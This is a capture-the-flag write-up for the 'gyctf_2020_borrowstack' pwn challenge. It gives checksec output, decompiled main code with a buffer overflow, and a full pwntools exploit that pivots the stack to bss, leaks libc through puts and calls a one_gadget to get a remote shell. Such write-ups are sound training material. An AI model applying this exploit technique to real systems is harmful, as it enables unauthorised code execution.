HugeH4rD

gyctf_2020_borrowstack

Ubuntu16.04

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/gyctf_2020_borrowstack/gyctf_2020_borrowstack'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[96]; // [rsp+0h] [rbp-60h] BYREF

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  puts(&s);
  read(0, buf, 0x70uLL);			//
  puts("Done!You can check and use your borrow stack now!");
  read(0, &bank, 0x100uLL);
  return 0;
}

0x02

---

思路

1.栈迁移

2.在bss上布置栈帧泄露libc

3.利用onegadget取得shell

0x03

---

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
path = './gyctf_2020_borrowstack'
# io = process([path])
io = remote("node4.buuoj.cn", 26449)
elf = ELF(path)
libc = ELF("libc-2.23.so")

padding = 0x60 + 0x8
bss = 0x601080
leave_ret = 0x400699  # leave ; ret
payload = flat(b'a' * 0x60, bss, leave_ret)
delim1 = b'Tell me what you want\n'
io.sendafter(delim1, payload)

pop_rdi_ret = 0x400703  # pop rdi ; ret
ret = 0x4004c9  # ret
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
# payload1 = flat(bss+0x90, p64(ret)*22, pop_rdi_ret, puts_got, puts_plt, main)
payload1 = p64(bss + 0x90) + p64(ret) * 22 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
delim2 = b'Done!You can check and use your borrow stack now!'
io.recvuntil(delim2)
io.send(payload1)
io.recv()
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print('[+] put_address', hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = gadget[1] + libc_base

payload2 = flat(b'a'*padding, one_gadget)
io.sendline(payload2)
io.interactive()